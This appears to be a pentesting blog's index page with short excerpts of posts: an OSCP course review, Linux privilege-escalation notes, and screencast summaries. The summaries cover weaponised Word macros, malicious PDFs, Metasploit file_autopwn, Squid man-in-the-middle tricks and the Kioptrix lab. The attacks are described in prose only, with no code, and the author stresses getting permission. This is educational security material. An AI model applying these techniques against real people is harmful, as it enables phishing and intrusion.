Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer, in this huge area. This is simply my finding, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just a different light. I know there more "things" to look for. It's just a basic & rough guide. Not every command will work for each system as Linux varies so much. "It" will not jump off the screen - you've to hunt for that "little thing" as "the devil is in the detail".
Pentesting With BackTrack (PWB) + Offensive Security Certified Professional (OSCP)
The views and opinions expressed on this site are those of the author. Any claim, statistic, quote or other representation about a product or service should be verified with the seller, manufacturer or provider.
Up until a month or so ago, everything I've learnt was done by using various free resources online. Last month however, I became an "offsec" student. I enrolled on the "Pentesting with BackTrack" (PWB) course, currently version 3 (syllabus). After the lab time is over, the student has the option of sitting an exam. Upon passing the exam, the student is awarded an Offensive Security Certified Professional (OSCP) certificate. I now have that certificate =). This is my review of it all.
July 2011 - Misc
As I've been hiding under a rock as of late, I thought I would check in and explain what's on my "to do" list to try and make up for the lack of posts. Hopefully, over the next few weeks:
- I've got 15-ish videos in the works, ready to be recorded ...and on that note...
- Not far off the 50th video. I've got something in mind for it =)
- I'm long overdue with releasing updates for a couple of scripts (fakeAP_pwn & wiffy to name a few), as well as a few new ones.
- I've also been bouncing a few ideas for a future project,and, as a result a couple of people are on board to give a hand for "bigger" things. When the time right, I'll ask for more help - I need to get a "framework/structure" in place first. More details at a later date!
Metasploit vs Microsoft Office
Following on from the Adobe Reader post, another very common document format is Microsoft's Office Word (.doc). This screencast demonstrates how embedding an evil 'macro' into the document can lead to compromising the target's computer.
A macro is an 'automated shortcut' to repeat tasks, in this case, to generate a meterpreter payload and connect back to the attacker. Even though the payload can be encoded to by-pass anti-virus, Microsoft Word still could block it depending on the macro security level.
To infect the target, the attacker scans the network and finds an open shared folder, which they have read & write access to. Upon viewing the contents of the folder, the attacker notices a Word Document. However, presenting the infected file could be done a number of different ways, such as emailing the target instead of scanning & replacing.
Dictionaries + Wordlists
In general, it's said that using a GOOD 'dictionary' or 'wordlist' (as far as I know, they're the same!) is 'key'. But what makes them GOOD? Most people will say 'the bigger, the better'; however, this isn't always the case... (for the record this isn't my opinion on the matter - more on this later).
Vulnerable by Design (Part 2)
OUTDATED.
SEE VULNHUB ~ http://vulnhub.com
Just a quick message, saying that I've (finally) updated an old post. I hope you find the new and updated challenges & puzzles useful. The updated complete list can be found here: https://blog.g0tmi1k.com/2011/03/vulnerable-by-design/.
Playing With Traffic (Squid)
Message from the author
Playing with traffic. Actually, it's more along the lines of "URL Manipulation"; however that didn't sound as "catchy". I do plan to do another video on "Altering (web) content", which would be more actuate in regards to "Playing With Traffic". This would be done using Squid (instead of using Ettercap) - and I've had some ideas for when I do this too!
This was posted on "April Fools" (The time for pranks and "gotchas") and what seems to be a (harmless) "prank" is still an attack. This means you need permission to do it (just like everything else on this site!) - as you may capture/discover more than you planned. Like always, make sure you have permission, and, due to the content of one of these attacks, you need to make sure you don't expose "minors". On that note: you're on your own. What you do, is your doing. What you make happen is your responsibility. You have been warned.
And with all of that out-of-the-way...
There is more to "Man in the Middle" attacks than just getting/collecting/harvesting emails/passwords/cookies. For example, the attacker could manipulate & alter the target's traffic to have some "malicious fun" (even though some scripts are "borderline childish"), to highlight the dangers of a "Man In The Middle" attack and what other abilities/options are available to the attacker. Below is a breakdown of the scripts demonstrated:
Metasploit vs. Adobe PDFs
This screencast demonstrates vulnerabilities in Adobe PDF Reader. Instead of creating a mass of vulnerable files , the attacker creates two PDFs (one relies on no user interaction and crashes the reader whereas the other one require the user to click through a few warning screens, however is then presented with a document).
The attacker emails these documents to the target (however they have to compress & encrypt the documents).
Owning Windows (XP SP3 vs. Metasploit's File_autopwn)
This screencast demonstrates metasploits ability to automatically generate vulnerable files which are read by a certain application to create an exploit.
After choosing a file to use, the attacker sends a email to the target with a masked URL to the vulnerable file and a link to the application, which is the "correct" version of it too!
Kioptrix - Level 1 (Samba)
Kioptrix is another "Vulnerable-By-Design OS" (like De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible. This is the second video on it, first one here. Unlike last time, the entry method was via a samba weakness method which is a quick attack and straight to root.